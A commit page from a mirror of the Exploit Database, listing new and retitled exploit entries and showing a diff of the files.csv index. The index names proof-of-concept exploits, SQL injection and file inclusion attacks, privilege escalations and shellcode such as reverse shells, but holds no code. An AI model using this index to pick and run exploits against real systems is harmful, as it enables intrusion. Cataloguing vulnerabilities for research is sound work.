bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-23

Browse source 
8 new exploits

xine-lib 1.1.12 - NSF demuxer Stack Overflow (PoC)
Xine-Lib 1.1.12 - NSF demuxer Stack Overflow (PoC)

3Com OfficeConnect Routers - Denial of Service (Content-Type)
3Com OfficeConnect Routers - (Content-Type) Denial of Service

xine-lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow
Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow

World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow
World Of Warcraft 3.3.5a - 'macros-cache.txt' Stack Overflow

Divx Player - Denial of Service
Divx Player 6.8.2 - Denial of Service

Microsoft Word (Win/Mac) - Crash (PoC)
Microsoft Word (Windows/OSX) - Crash (PoC)
TP-LINK TDDP - Multiple Vulnerabilities
Microsoft Internet Explorer 8 MSHTML - 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption

Office 2008 sp0 - RTF pFragments MAC Exploit
Microsoft Office 2008 SP0 (Mac) - RTF pFragments Exploit

Huawei UTPS - Unquoted Service Path Privilege Escalation

xine-lib 1.1 - (media player library) Remote Format String
Xine-Lib 1.1 - (media player library) Remote Format String

Office Viewer ActiveX Control 3.0.1 - (Save) Remote File Overwrite
Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite

3Com OfficeConnect Secure Router 1.04-168 - Tk Parameter Cross-Site Scripting
3Com OfficeConnect Secure Router 1.04-168 - 'Tk' Parameter Cross-Site Scripting

xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities
Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities

Crestron AM-100 - Multiple Vulnerabilities

Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)

Simple Machines Forum 1.0.4 - (modify) SQL Injection
Simple Machines Forum (SMF) 1.0.4 - 'modify' SQL Injection

PHP-Fusion 6.00.109 - (msg_send) SQL Injection
PHP-Fusion 6.00.109 - 'msg_send' Parameter SQL Injection

PHP-Fusion 6.00.3 - (rating) Parameter SQL Injection
PHP-Fusion 6.00.3 - 'rating' Parameter SQL Injection

PHP-Fusion 6.00.306 - (srch_where) SQL Injection
PHP-Fusion 6.00.306 - 'srch_where' Parameter SQL Injection

Simple Machines Forum 1.1 rc2 (Windows) - (lngfile) Remote Exploit
Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Remote Exploit

Simple Machines Forum 1.1 rc2 - Lock Topics Remote Exploit
Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote Exploit

AllMyGuests 0.4.1 - (cfg_serverpath) Remote File Inclusion
AllMyGuests 0.4.1 - 'cfg_serverpath' Parameter Remote File Inclusion

Virtual Law Office - (phpc_root_path) Remote File Inclusion
Virtual Law Office - 'phpc_root_path' Remote File Inclusion

AllMyGuests 0.3.0 - (AMG_serverpath) Remote File Inclusion
AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion

Simple Machines Forum 1.1.3 - Blind SQL Injection
Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection
BosClassifieds 3.0 - (index.php cat) SQL Injection
BosNews 4.0 - (article) SQL Injection
BosClassifieds 3.0 - 'index.php' SQL Injection
BosNews 4.0 - 'article' Parameter SQL Injection

Classifieds Caffe - 'index.php cat_id' SQL Injection
Classifieds Caffe - 'cat_id' Parameter SQL Injection
carbon communities 2.4 - Multiple Vulnerabilities
XplodPHP AutoTutorials 2.1 - 'id' SQL Injection
Carbon Communities 2.4 - Multiple Vulnerabilities
XplodPHP AutoTutorials 2.1 - 'id' Parameter SQL Injection
Grape Statistics 0.2a - (location) Remote File Inclusion
5th Avenue Shopping Cart - 'category_id' SQL Injection
Grape Statistics 0.2a - 'location' Parameter Remote File Inclusion
5th Avenue Shopping Cart - 'category_id' Parameter SQL Injection
PhShoutBox 1.5 - (final) Insecure Cookie Handling
Simple Customer 1.2 - (contact.php id) SQL Injection
AllMyGuests 0.4.1 - (AMG_id) SQL Injection
PhShoutBox 1.5 - Insecure Cookie Handling
Simple Customer 1.2 - 'contact.php' SQL Injection
AllMyGuests 0.4.1 - 'AMG_id' Parameter SQL Injection

Simple Machines Forum 1.1.4 - SQL Injection
Simple Machines Forum (SMF) 1.1.4 - SQL Injection

virtual support office-xp 3.0.29 - Multiple Vulnerabilities
Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities

PHP-Fusion Mod Classifieds - (lid) SQL Injection
PHP-Fusion Mod Classifieds - 'lid' Parameter SQL Injection

Simple Machines Forum 1.1.5 (Windows x86) - Admin Reset Password Exploit
Simple Machines Forum (SMF) 1.1.5 (Windows x86) - Admin Reset Password Exploit

PHP-Fusion Mod freshlinks - (linkid) SQL Injection
PHP-Fusion Mod freshlinks - 'linkid' Parameter SQL Injection

PHP-Fusion Mod manuals - (manual) SQL Injection
PHP-Fusion Mod manuals - 'manual' Parameter SQL Injection

PHP-Fusion Mod triscoop_race_system - (raceid) SQL Injection
PHP-Fusion Mod triscoop_race_system - 'raceid' Parameter SQL Injection

BosDev BosClassifieds - 'cat_id' SQL Injection
BosClassifieds - 'cat_id' SQL Injection

Simple Machines Forum 1.1.6 - (Local File Inclusion) Code Execution
Simple Machines Forum (SMF) 1.1.6 - (Local File Inclusion) Code Execution

PHP-Fusion 7.00.1 - (messages.php) SQL Injection
PHP-Fusion 7.00.1 - 'messages.php' SQL Injection

Check New 4.52 - (findoffice.php search) SQL Injection
Check New 4.52 - 'findoffice.php search' SQL Injection

PHP-Fusion Mod E-Cart 1.3 - (items.php CA) SQL Injection
PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection

PHP-Fusion Mod the_kroax (comment_id) - SQL Injection
PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection

Simple Machines Forum 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload
Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload

Simple Machines Forums - (BBCode) Cookie Stealing
Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing

PHP-Fusion Mod Book Panel - (bookid) SQL Injection
PHP-Fusion Mod Book Panel - 'bookid' Parameter SQL Injection

PHP-Fusion Mod Book Panel - (course_id) SQL Injection
PHP-Fusion Mod Book Panel - 'course_id' Parameter SQL Injection

Opencart 1.1.8 - (route) Local File Inclusion
Opencart 1.1.8 - 'route' Local File Inclusion

exjune officer message system 1 - Multiple Vulnerabilities
Exjune Officer Message System 1 - Multiple Vulnerabilities

Simple Machines Forum - Multiple Security Vulnerabilities
Simple Machines Forum (SMF) - Multiple Security Vulnerabilities

PHP-Fusion 6.01.15.4 - (downloads.php) SQL Injection
PHP-Fusion 6.01.15.4 - 'downloads.php' SQL Injection

Simple Machines Forum (SMF) 1.1.8 - (avatar) Remote PHP File Execute (PoC)
Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute (PoC)

PHP-fusion dsmsf - (module downloads) SQL Injection
PHP-fusion dsmsf Mod Downloads - SQL Injection

Group Office - (comment_id) SQL Injection
Group Office - 'comment_id' SQL Injection

PHP-Fusion MG - User-Fotoalbum SQL Injection
PHP-Fusion Mod Mg User Fotoalbum 1.0.1 - SQL Injection

Simple Machines forum (SMF) 2.0 - session Hijacking
Simple Machines Forum (SMF) 2.0 - Session Hijacking

AllMyGuests 0.x - info.inc.php Arbitrary Code Execution
AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution

Simple Machines Forum 1.0 - Size Tag HTML Injection
Simple Machines Forum (SMF) 1.0 - Size Tag HTML Injection

OpenCart 1.5.5.1 - (FileManager.php) Directory Traversal Arbitrary File Access
OpenCart 1.5.5.1 - 'FileManager.php' Directory Traversal Arbitrary File Access

PHP-Fusion 4.0 - Viewthread.php Information Disclosure
PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure

PHP-Fusion 4/5 - Setuser.php HTML Injection
PHP-Fusion 4/5 - 'Setuser.php' HTML Injection

PHP-Fusion 4.0/5.0/6.0 - messages.php SQL Injection
PHP-Fusion 4.0/5.0/6.0 - 'messages.php' SQL Injection

PHP-Fusion 6.0.109 - messages.php SQL Injection
PHP-Fusion 6.0.109 - 'messages.php' SQL Injection

PHP-Fusion 6.0 - members.php Cross-Site Scripting
PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting

PHP-Fusion 6.0.x - news.php SQL Injection
PHP-Fusion 6.0.x - 'news.php' SQL Injection

Simple Machines Forum 1.0/1.1 - 'index.php' Cross-Site Scripting
Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting

PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection
PHP-Fusion 6.1.5 Mod Calendar_Panel - 'Show_Event.php' SQL Injection

Simple Machines Forum 1.1.4 - Multiple Remote File Inclusion
Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusion

Simple Machines Forum 1.1.6 - HTTP POST Request Filter Security Bypass
Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass

OpenCart 1.5.6.1 - (openbay) Multiple SQL Injection
OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injection

Simple Machines Forum 1.1.7 - '[url]' Tag HTML Injection
Simple Machines Forum (SMF) 1.1.7 - '[url]' Tag HTML Injection

PHP-Fusion - 'articles.php' Cross-Site Scripting
AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting

Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery
Simple Machines Forum (SMF) 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery

Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload
Simple Machines Forum (SMF) 1.1.15 - 'fckeditor' Arbitrary File Upload

WordPress Plugin Dharma booking 2.38.3 - File Inclusion
WordPress Plugin Dharma Booking 2.38.3 - File Inclusion
EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution
SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection
This commit is contained in:
Offensive Security 2016-11-23 05:01:19 +00:00
parent dab1517032
commit 32fc589910
13 changed files with 1216 additions and 98 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

159
files.csv
View file

@ -724,7 +724,7 @@ id,file,description,date,author,platform,type,port
5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service",2008-04-13,j0rgan,windows,dos,0
5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos,0
5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 - '.srt' File Buffer Overflow (PoC)",2008-04-16,j0rgan,windows,dos,0
5458,platforms/linux/dos/5458.txt,"xine-lib 1.1.12 - NSF demuxer Stack Overflow (PoC)",2008-04-16,"Guido Landi",linux,dos,0
5458,platforms/linux/dos/5458.txt,"Xine-Lib 1.1.12 - NSF demuxer Stack Overflow (PoC)",2008-04-16,"Guido Landi",linux,dos,0
5460,platforms/windows/dos/5460.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)",2008-04-17,"Shennan Wang",windows,dos,0
5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos,0
5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - (mailto: scheme) Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0
@ -1289,7 +1289,7 @@ id,file,description,date,author,platform,type,port
40306,platforms/php/dos/40306.php,"PHP 5.0.0 - 'xmldocfile()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0
40307,platforms/multiple/dos/40307.txt,"Adobe Flash - Selection.setFocus Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers - Remote Denial of Service",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0
10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - Denial of Service (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0
10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - (Content-Type) Denial of Service",2009-12-21,"Alberto Ortega",hardware,dos,0
10593,platforms/windows/dos/10593.txt,"Winamp 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0
10603,platforms/windows/dos/10603.c,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,windows,dos,0
10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0
@ -3901,7 +3901,7 @@ id,file,description,date,author,platform,type,port
30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0
30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 - Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0
30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 - NULL-Pointer Dereference Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0
31002,platforms/linux/dos/31002.txt,"xine-lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow",2008-01-09,"Luigi Auriemma",linux,dos,0
31002,platforms/linux/dos/31002.txt,"Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow",2008-01-09,"Luigi Auriemma",linux,dos,0
31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53
31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 - Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0
31021,platforms/osx/dos/31021.html,"Apple Safari 2.0.4 - KHTML WebKit Remote Denial of Service",2008-01-12,"David Barroso",osx,dos,0
@ -4290,7 +4290,7 @@ id,file,description,date,author,platform,type,port
34093,platforms/windows/dos/34093.txt,"EA Battlefield 2 1.41 / Battlefield 2142 1.50 - Multiple Denial of Service Vulnerabilities",2010-06-07,"Francis Lavoie-Renaud",windows,dos,0
34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver - '.ar' Buffer Overflow",2010-01-15,R3d-D3V!L,windows,dos,0
34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0
34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a - 'macros-cache.txt' Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial of Service",2010-06-17,"Luigi Auriemma",windows,dos,0
@ -4577,7 +4577,7 @@ id,file,description,date,author,platform,type,port
37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37612,platforms/windows/dos/37612.py,"ZOC Terminal Emulator 7 - (Quick Connection) Crash (PoC)",2015-07-14,"SATHISH ARTHAR",windows,dos,0
37639,platforms/multiple/dos/37639.html,"Mozilla Firefox - Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",multiple,dos,0
37640,platforms/windows/dos/37640.pl,"Divx Player - Denial of Service",2012-08-20,Dark-Puzzle,windows,dos,0
37640,platforms/windows/dos/37640.pl,"Divx Player 6.8.2 - Denial of Service",2012-08-20,Dark-Puzzle,windows,dos,0
37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash (PoC)",2015-07-20,"Mohammad Reza Espargham",ios,dos,0
37663,platforms/linux/dos/37663.txt,"TcpDump - rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0
37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection Denial of Service (PoC)",2015-07-22,"Todor Donev",windows,dos,0
@ -5133,7 +5133,7 @@ id,file,description,date,author,platform,type,port
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash (PoC)",2016-05-31,"David Silveiro",linux,dos,0
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Win/Mac) - Crash (PoC)",2016-06-09,halsten,multiple,dos,0
39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Windows/OSX) - Crash (PoC)",2016-06-09,halsten,multiple,dos,0
39915,platforms/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,windows,dos,0
39920,platforms/osx/dos/39920.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0
39921,platforms/android/dos/39921.txt,"Android - /system/bin/sdcard Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0
@ -5275,6 +5275,8 @@ id,file,description,date,author,platform,type,port
40797,platforms/windows/dos/40797.html,"Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104)",2016-11-21,Skylined,windows,dos,0
40798,platforms/windows/dos/40798.html,"Microsoft Internet Explorer 8 jscript - 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018)",2016-11-21,Skylined,windows,dos,0
40806,platforms/linux/dos/40806.py,"NTP 4.2.8p8 - Denial of Service",2016-11-21,"Magnus Klaaborg Stubman",linux,dos,0
40814,platforms/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",hardware,dos,1040
40815,platforms/windows/dos/40815.html,"Microsoft Internet Explorer 8 MSHTML - 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption",2016-11-22,Skylined,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6851,7 +6853,7 @@ id,file,description,date,author,platform,type,port
18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0
18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0
18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0
18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
18749,platforms/osx/local/18749.py,"Microsoft Office 2008 SP0 (Mac) - RTF pFragments Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
18760,platforms/windows/local/18760.rb,"xRadio 0.95b - Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,local,0
@ -8650,6 +8652,7 @@ id,file,description,date,author,platform,type,port
40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9025,7 +9028,7 @@ id,file,description,date,author,platform,type,port
1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player (Linux) - Remote Format String",2005-09-26,c0ntex,linux,remote,0
1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 (FreeBSD) - 'Search' Remote Format String",2005-09-26,"Angelo Rosiello",bsd,remote,143
1238,platforms/linux/remote/1238.c,"Prozilla 1.3.7.4 - (ftpsearch) Results Handling Buffer Overflow",2005-10-02,taviso,linux,remote,8080
1242,platforms/linux/remote/1242.pl,"xine-lib 1.1 - (media player library) Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote,0
1242,platforms/linux/remote/1242.pl,"Xine-Lib 1.1 - (media player library) Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote,0
1243,platforms/windows/remote/1243.c,"CA iTechnology iGateway - (debug mode) Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250
1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution",2005-10-11,RusH,linux,remote,0
1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) SQL Injection",2005-10-18,rgod,linux,remote,0
@ -9744,7 +9747,7 @@ id,file,description,date,author,platform,type,port
7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0
7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0
7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote Command Execution",2009-01-13,Houssamix,windows,remote,0
7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote Command Execution",2009-01-13,Cyber-Zone,windows,remote,0
7757,platforms/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote Command Execution",2009-01-13,Stack,windows,remote,0
@ -13611,7 +13614,7 @@ id,file,description,date,author,platform,type,port
30130,platforms/php/remote/30130.txt,"PHP 5.2.3 - EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote,0
30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow",2007-06-04,"KaiJern Lau",linux,remote,0
30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow",2007-06-04,shinnai,windows,remote,0
30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - Tk Parameter Cross-Site Scripting",2007-06-08,"Secunia Research",hardware,remote,0
30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - 'Tk' Parameter Cross-Site Scripting",2007-06-08,"Secunia Research",hardware,remote,0
30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,windows,remote,0
30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows - Protocol Handler Command Injection",2007-06-12,"Thor Larholm",windows,remote,0
30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use-After-Free (Metasploit)",2013-12-17,Metasploit,windows,remote,0
@ -13816,7 +13819,7 @@ id,file,description,date,author,platform,type,port
31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80
31254,platforms/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
31255,platforms/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
31462,platforms/linux/remote/31462.c,"xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0
31462,platforms/linux/remote/31462.c,"Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0
31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",windows,remote,53
31264,platforms/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,php,remote,80
31279,platforms/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 - Calendar 'Count' Parameter Cross-Site Scripting",2008-02-21,"Nir Goldshlager AVNE",multiple,remote,0
@ -15086,6 +15089,7 @@ id,file,description,date,author,platform,type,port
40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0
40778,platforms/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote,0
40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15684,6 +15688,7 @@ id,file,description,date,author,platform,type,port
40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -15803,7 +15808,7 @@ id,file,description,date,author,platform,type,port
1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0
1052,platforms/php/webapps/1052.php,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,php,webapps,0
1053,platforms/php/webapps/1053.pl,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)",2005-06-19,K-C0d3r,php,webapps,0
1057,platforms/php/webapps/1057.pl,"Simple Machines Forum 1.0.4 - (modify) SQL Injection",2005-06-21,"James Bercegay",php,webapps,0
1057,platforms/php/webapps/1057.pl,"Simple Machines Forum (SMF) 1.0.4 - 'modify' SQL Injection",2005-06-21,"James Bercegay",php,webapps,0
